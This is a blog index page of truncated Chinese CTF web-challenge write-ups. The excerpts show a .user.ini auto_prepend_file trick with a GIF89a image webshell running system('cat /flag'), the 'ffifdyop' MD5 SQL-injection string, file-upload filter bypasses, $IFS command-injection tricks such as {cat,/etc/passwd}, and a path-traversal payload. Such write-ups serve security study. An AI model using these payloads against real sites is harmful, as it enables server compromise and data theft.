C10ud

摘要： 一 前置知识 .user.ini文件 参考 二 解题 上传.user.ini文件，将我们上传的图片马当做php解析执行 GIF89a auto_prepend_file=shell.jpg 上传图片马 GIF89a <script language='php'>system('cat /flag') 阅读全文

摘要： 一 前置知识点 file_get_contents函数 — 将整个文件读入一个字符串 ctf中伪协议总结 二 解题 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset( 阅读全文

摘要： 抓包查看响应包。 看来是md5注入。 看一下md5函数 对于ffifdyop这个字符串经过md5函数加密为16位原始二进制格式的字符串。 content: ffifdyop hex: 276f722736c95d99e921722cf9ed621c raw: 'or'6\xc9]\x99\xe9!r 阅读全文

摘要： 查看前段发现一段php if (isset($_POST['password'])) { $password = $_POST['password']; if (is_numeric($password)) { echo "password can't be number</br>"; }elsei 阅读全文

摘要： 根据提示，考虑为源码泄露 掏出 dirsearch扫 扫到.bak备份文件 <?php include_once "flag.php"; if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) { exit("Just 阅读全文

摘要： 上传php一句话木马 传不上去 经查看前段没有过滤函数 所以是服务器对文件上传做了限制 文件上传校验姿势 客户端javascript校验（一般只校验后缀名） 服务端校验 文件头content-type字段校验（image/gif） 文件内容头校验（GIF89a） 后缀名黑名单校验 后缀名白名单校验 阅读全文

摘要： 下载熊海cms整个文件 phpstudy本地搭建网站完之后 先查看目录 ——admin //后台文件 ——css //css文件 ——files //功能函数文件 ——images //图片 ——index.php //主目录文件 ——inc //include的简写，存放头文件的 ——instal 阅读全文

摘要： 提示备份文件 直接url/www.zip得到源代码 分别得到以下关键代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesy 阅读全文

摘要： 前置知识： 过滤空格： 1 %20(space)、%09(tab)、$IFS$9、 IFS、IFS2 使用<或者<>来绕过空格 cat<a.txt3 花括号扩展{OS_COMMAND,ARGUMENT} {cat,/etc/passwd}4 $IFS 空格绕过 cat$IFSa.txt5 变量控制 阅读全文

摘要： [HCTF 2018]WarmUp payload 为?file=source.php%253f/../../../../../ffffllllaaaagggg 参考wp 代码中的难理解的语句： $_page = mb_substr( $_page, 0, mb_strpos($_page . '? 阅读全文